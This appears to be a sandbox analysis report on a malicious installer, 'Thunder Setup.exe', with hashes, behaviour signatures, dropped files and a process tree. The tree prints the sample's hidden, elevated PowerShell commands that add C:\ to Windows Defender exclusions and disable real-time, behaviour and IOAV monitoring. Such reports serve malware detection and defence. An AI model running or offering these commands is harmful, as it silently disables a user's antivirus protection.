Resubmissions

14/07/2024, 22:14

240714-15wd4sxcrg 8

14/07/2024, 16:06

240714-tj3gzaxdrn 8

Analysis

  • max time kernel
    301s
  • max time network
    276s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14/07/2024, 22:14

General

  • Target

    Thunder Setup.exe

  • Size

    78KB

  • MD5

    1eb797341e423c83060a36b92c720cc9

  • SHA1

    380828212f0bb9a82d568491247a590a316e4351

  • SHA256

    0842a46a5113b1ff571e62101c556565c853a0c0c792f7fdde57eb40e0256177

  • SHA512

    9115d3a22f0163747de035273cd44caa84c46e17cd3fee863172e35688455def25e07bdbf7bdcec940dfd8bd2da7eb10e360d7f5a9413efc8c4b61ad4605c19b

  • SSDEEP

    1536:aZ2FWSNhd/4131izmvch6oKnLzx9QAkhHQ40Gp/VS6:A2ddQ131izLh6oqLzHHuHQ40Gp/VT

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Run Powershell and hide display window.

  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Thunder Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\Thunder Setup.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4224
    • C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe
      "C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\activation.jar;lib\antlr4-runtime.jar;lib\asm-all.jar;lib\commons-email.jar;lib\connector-api.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\dyn4j.jar;lib\gson.jar;lib\HikariCP-java6.jar;lib\javassist-GA.jar;lib\jaybird-jdk18.jar;lib\jfoenix.jar;lib\jkeymaster.jar;lib\jna.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-desktop-hotkey-ext.jar;lib\jphp-game-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-gui-jfoenix-ext.jar;lib\jphp-json-ext.jar;lib\jphp-jsoup-ext.jar;lib\jphp-mail-ext.jar;lib\jphp-runtime.jar;lib\jphp-sql-ext.jar;lib\jphp-systemtray-ext.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\jsoup.jar;lib\mail.jar;lib\mysql-connector-java.jar;lib\postgresql.jre7.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\sqlite-jdbc.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4092
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
        Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Add-MpPreference -Force -ExclusionPath C:\' -Verb RunAs}"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4696
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -Force -ExclusionPath C:\
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1404
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
        Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableBehaviorMonitoring ' -Verb RunAs}"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3132
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableBehaviorMonitoring
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3392
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
        Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableIOAVProtection ' -Verb RunAs}"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2500
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableIOAVProtection
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4808
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
        Powershell.exe -Command "& {Start-Process Powershell.exe -WindowStyle hidden -ArgumentList '-Command Set-MpPreference -Force -DisableRealtimeMonitoring ' -Verb RunAs}"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2592
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Set-MpPreference -Force -DisableRealtimeMonitoring
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3872

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Powershell.exe.log

    Filesize

    1KB

    MD5

    def65711d78669d7f8e69313be4acf2e

    SHA1

    6522ebf1de09eeb981e270bd95114bc69a49cda6

    SHA256

    aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c

    SHA512

    05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    15KB

    MD5

    27088a26b157d4f73b6dd7d06a180f70

    SHA1

    5e329a4451a85d386c0dfb1bc754f13336861782

    SHA256

    24b13b266cfeabdc512449170ac13f138e9e1430ab229c5b1cfd55617f110e5a

    SHA512

    236c0465e8ea15177a69dfe5eb7d84be14b2af137c61b5c0e22c66ecc5aefe041e0e2ad81a901ad8ef9661f877cc48e146fe1096a959c9675e8f492033dff25b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    97353662244bc4174db14298cab90c7c

    SHA1

    c3e4fae1cb1263905e01920caafe8f6a050d7477

    SHA256

    d74803d04a069382bb4ceb041629f95928fe2a03a538168dd102f01478e346e5

    SHA512

    edf211ba60bff6e320421fd6332e1c990c4a8c2999b2fbc660284dc94524d569fbdd3367d56fe3dbb27ae53176bf2ea3f0e5d7b2b6ee7c2ed443b01489f15abf

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    d72baa035d4247e98ded1192edefea59

    SHA1

    bdd6ccb929d749934f1aed7f104776b82c60d82c

    SHA256

    31a4370f061895b286cf902bab6fd890625e417d3323452e443adc145491510c

    SHA512

    ff20d28bf34948d2ae21cfaec5a949701f0cf385a8e0bb7dc239ddf490276a1d12d474b7028e8795c03b40f0a11b8e90f552e3a29410c5a20b4c1d7acccc5923

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    964d3e54bc9013419009d9e77bfa9829

    SHA1

    36387b307b0c6b41bd1bbf73d5a4c547893fce0f

    SHA256

    cf62dbf0e0f300f85d8eb7e2cdb053ca3b5f80bb59fbff9fbedc2fc4c2404602

    SHA512

    a01eabde120e55749886f09c2eb22d78633004bac71ba120180ad0b80ad508c593caa0a713aae92e6f99d03c740a17bcdd40b443be20f9492e6cec20cef771d7

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2qvrvtwi.pnm.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/2500-187-0x0000000005350000-0x00000000053B6000-memory.dmp

    Filesize

    408KB

  • memory/2500-185-0x0000000004BF0000-0x0000000004C12000-memory.dmp

    Filesize

    136KB

  • memory/2500-188-0x00000000054C0000-0x0000000005814000-memory.dmp

    Filesize

    3.3MB

  • memory/2500-186-0x00000000052E0000-0x0000000005346000-memory.dmp

    Filesize

    408KB

  • memory/2592-226-0x00000000064B0000-0x00000000064FC000-memory.dmp

    Filesize

    304KB

  • memory/2592-225-0x0000000005F20000-0x0000000005F3E000-memory.dmp

    Filesize

    120KB

  • memory/3132-184-0x0000000005320000-0x0000000005948000-memory.dmp

    Filesize

    6.2MB

  • memory/3132-183-0x0000000002BE0000-0x0000000002C16000-memory.dmp

    Filesize

    216KB

  • memory/4092-120-0x0000000001260000-0x0000000001261000-memory.dmp

    Filesize

    4KB

  • memory/4092-132-0x0000000002EB0000-0x0000000002EB8000-memory.dmp

    Filesize

    32KB

  • memory/4092-44-0x0000000002E10000-0x0000000002E18000-memory.dmp

    Filesize

    32KB

  • memory/4092-49-0x0000000002E18000-0x0000000002E20000-memory.dmp

    Filesize

    32KB

  • memory/4092-53-0x0000000002E20000-0x0000000002E28000-memory.dmp

    Filesize

    32KB

  • memory/4092-52-0x0000000002D40000-0x0000000002D68000-memory.dmp

    Filesize

    160KB

  • memory/4092-56-0x0000000002E28000-0x0000000002E30000-memory.dmp

    Filesize

    32KB

  • memory/4092-55-0x0000000002D88000-0x0000000002D90000-memory.dmp

    Filesize

    32KB

  • memory/4092-59-0x0000000002DD8000-0x0000000002DE0000-memory.dmp

    Filesize

    32KB

  • memory/4092-58-0x0000000002D90000-0x0000000002D98000-memory.dmp

    Filesize

    32KB

  • memory/4092-64-0x0000000002E30000-0x0000000002E38000-memory.dmp

    Filesize

    32KB

  • memory/4092-63-0x0000000002DE8000-0x0000000002DF0000-memory.dmp

    Filesize

    32KB

  • memory/4092-62-0x0000000002D78000-0x0000000002D80000-memory.dmp

    Filesize

    32KB

  • memory/4092-61-0x0000000002DE0000-0x0000000002DE8000-memory.dmp

    Filesize

    32KB

  • memory/4092-68-0x0000000002E38000-0x0000000002E40000-memory.dmp

    Filesize

    32KB

  • memory/4092-67-0x0000000002DF0000-0x0000000002DF8000-memory.dmp

    Filesize

    32KB

  • memory/4092-72-0x0000000002E40000-0x0000000002E48000-memory.dmp

    Filesize

    32KB

  • memory/4092-71-0x0000000002DF8000-0x0000000002E00000-memory.dmp

    Filesize

    32KB

  • memory/4092-76-0x0000000002E48000-0x0000000002E50000-memory.dmp

    Filesize

    32KB

  • memory/4092-75-0x0000000002E00000-0x0000000002E08000-memory.dmp

    Filesize

    32KB

  • memory/4092-79-0x0000000002E50000-0x0000000002E58000-memory.dmp

    Filesize

    32KB

  • memory/4092-78-0x0000000002E08000-0x0000000002E10000-memory.dmp

    Filesize

    32KB

  • memory/4092-86-0x0000000002E58000-0x0000000002E60000-memory.dmp

    Filesize

    32KB

  • memory/4092-85-0x0000000002E10000-0x0000000002E18000-memory.dmp

    Filesize

    32KB

  • memory/4092-91-0x0000000002E60000-0x0000000002E68000-memory.dmp

    Filesize

    32KB

  • memory/4092-90-0x0000000002E18000-0x0000000002E20000-memory.dmp

    Filesize

    32KB

  • memory/4092-95-0x0000000002E68000-0x0000000002E70000-memory.dmp

    Filesize

    32KB

  • memory/4092-94-0x0000000002E20000-0x0000000002E28000-memory.dmp

    Filesize

    32KB

  • memory/4092-99-0x0000000002E70000-0x0000000002E78000-memory.dmp

    Filesize

    32KB

  • memory/4092-97-0x0000000002E28000-0x0000000002E30000-memory.dmp

    Filesize

    32KB

  • memory/4092-100-0x0000000002E78000-0x0000000002E80000-memory.dmp

    Filesize

    32KB

  • memory/4092-104-0x0000000002E80000-0x0000000002E88000-memory.dmp

    Filesize

    32KB

  • memory/4092-103-0x0000000002E30000-0x0000000002E38000-memory.dmp

    Filesize

    32KB

  • memory/4092-107-0x0000000002E88000-0x0000000002E90000-memory.dmp

    Filesize

    32KB

  • memory/4092-106-0x0000000002E38000-0x0000000002E40000-memory.dmp

    Filesize

    32KB

  • memory/4092-111-0x0000000002E90000-0x0000000002E98000-memory.dmp

    Filesize

    32KB

  • memory/4092-110-0x0000000002E40000-0x0000000002E48000-memory.dmp

    Filesize

    32KB

  • memory/4092-113-0x0000000001260000-0x0000000001261000-memory.dmp

    Filesize

    4KB

  • memory/4092-118-0x0000000002E98000-0x0000000002EA0000-memory.dmp

    Filesize

    32KB

  • memory/4092-117-0x0000000002E48000-0x0000000002E50000-memory.dmp

    Filesize

    32KB

  • memory/4092-40-0x0000000001260000-0x0000000001261000-memory.dmp

    Filesize

    4KB

  • memory/4092-123-0x0000000002EA0000-0x0000000002EA8000-memory.dmp

    Filesize

    32KB

  • memory/4092-122-0x0000000002E50000-0x0000000002E58000-memory.dmp

    Filesize

    32KB

  • memory/4092-126-0x0000000002EA8000-0x0000000002EB0000-memory.dmp

    Filesize

    32KB

  • memory/4092-125-0x0000000002E58000-0x0000000002E60000-memory.dmp

    Filesize

    32KB

  • memory/4092-131-0x0000000002E60000-0x0000000002E68000-memory.dmp

    Filesize

    32KB

  • memory/4092-133-0x0000000002EB8000-0x0000000002EC0000-memory.dmp

    Filesize

    32KB

  • memory/4092-42-0x0000000002E08000-0x0000000002E10000-memory.dmp

    Filesize

    32KB

  • memory/4092-138-0x0000000002EC0000-0x0000000002EC8000-memory.dmp

    Filesize

    32KB

  • memory/4092-137-0x0000000002E68000-0x0000000002E70000-memory.dmp

    Filesize

    32KB

  • memory/4092-141-0x0000000002EC8000-0x0000000002ED0000-memory.dmp

    Filesize

    32KB

  • memory/4092-140-0x0000000002E70000-0x0000000002E78000-memory.dmp

    Filesize

    32KB

  • memory/4092-145-0x0000000002ED0000-0x0000000002ED8000-memory.dmp

    Filesize

    32KB

  • memory/4092-144-0x0000000002E78000-0x0000000002E80000-memory.dmp

    Filesize

    32KB

  • memory/4092-149-0x0000000002EE0000-0x0000000002EE8000-memory.dmp

    Filesize

    32KB

  • memory/4092-150-0x0000000002ED8000-0x0000000002EE0000-memory.dmp

    Filesize

    32KB

  • memory/4092-148-0x0000000002E80000-0x0000000002E88000-memory.dmp

    Filesize

    32KB

  • memory/4092-154-0x0000000002EE8000-0x0000000002EF0000-memory.dmp

    Filesize

    32KB

  • memory/4092-153-0x0000000002E88000-0x0000000002E90000-memory.dmp

    Filesize

    32KB

  • memory/4092-155-0x0000000002E90000-0x0000000002E98000-memory.dmp

    Filesize

    32KB

  • memory/4092-157-0x0000000002EF0000-0x0000000002EF8000-memory.dmp

    Filesize

    32KB

  • memory/4092-159-0x0000000002E98000-0x0000000002EA0000-memory.dmp

    Filesize

    32KB

  • memory/4092-160-0x0000000002EF8000-0x0000000002F00000-memory.dmp

    Filesize

    32KB

  • memory/4092-163-0x0000000002F00000-0x0000000002F08000-memory.dmp

    Filesize

    32KB

  • memory/4092-162-0x0000000002EA0000-0x0000000002EA8000-memory.dmp

    Filesize

    32KB

  • memory/4092-166-0x0000000002F08000-0x0000000002F10000-memory.dmp

    Filesize

    32KB

  • memory/4092-165-0x0000000002EA8000-0x0000000002EB0000-memory.dmp

    Filesize

    32KB

  • memory/4092-171-0x0000000002F10000-0x0000000002F18000-memory.dmp

    Filesize

    32KB

  • memory/4092-170-0x0000000002EB8000-0x0000000002EC0000-memory.dmp

    Filesize

    32KB

  • memory/4092-169-0x0000000002EB0000-0x0000000002EB8000-memory.dmp

    Filesize

    32KB

  • memory/4092-174-0x0000000002F18000-0x0000000002F20000-memory.dmp

    Filesize

    32KB

  • memory/4092-39-0x0000000002E00000-0x0000000002E08000-memory.dmp

    Filesize

    32KB

  • memory/4092-37-0x0000000002DF8000-0x0000000002E00000-memory.dmp

    Filesize

    32KB

  • memory/4092-36-0x0000000002DF0000-0x0000000002DF8000-memory.dmp

    Filesize

    32KB

  • memory/4092-30-0x0000000002DE0000-0x0000000002DE8000-memory.dmp

    Filesize

    32KB

  • memory/4092-31-0x0000000002D78000-0x0000000002D80000-memory.dmp

    Filesize

    32KB

  • memory/4092-173-0x0000000002EC0000-0x0000000002EC8000-memory.dmp

    Filesize

    32KB

  • memory/4092-177-0x0000000002EC8000-0x0000000002ED0000-memory.dmp

    Filesize

    32KB

  • memory/4092-178-0x0000000002F20000-0x0000000002F28000-memory.dmp

    Filesize

    32KB

  • memory/4092-179-0x0000000001260000-0x0000000001261000-memory.dmp

    Filesize

    4KB

  • memory/4092-227-0x0000000001260000-0x0000000001261000-memory.dmp

    Filesize

    4KB

  • memory/4092-6-0x0000000002D40000-0x0000000002D68000-memory.dmp

    Filesize

    160KB

  • memory/4092-10-0x0000000002D88000-0x0000000002D90000-memory.dmp

    Filesize

    32KB

  • memory/4092-13-0x0000000002D90000-0x0000000002D98000-memory.dmp

    Filesize

    32KB

  • memory/4092-278-0x0000000002ED0000-0x0000000002ED8000-memory.dmp

    Filesize

    32KB

  • memory/4092-33-0x0000000002DE8000-0x0000000002DF0000-memory.dmp

    Filesize

    32KB

  • memory/4092-32-0x0000000002D80000-0x0000000002D88000-memory.dmp

    Filesize

    32KB

  • memory/4224-0-0x0000000000400000-0x0000000000420000-memory.dmp

    Filesize

    128KB

  • memory/4696-231-0x0000000007930000-0x0000000007ED4000-memory.dmp

    Filesize

    5.6MB

  • memory/4696-229-0x0000000006710000-0x000000000672A000-memory.dmp

    Filesize

    104KB

  • memory/4696-230-0x0000000006760000-0x0000000006782000-memory.dmp

    Filesize

    136KB

  • memory/4696-228-0x00000000072E0000-0x0000000007376000-memory.dmp

    Filesize

    600KB

  • memory/4808-280-0x000000006EA60000-0x000000006EAAC000-memory.dmp

    Filesize

    304KB

  • memory/4808-279-0x0000000006A80000-0x0000000006AB2000-memory.dmp

    Filesize

    200KB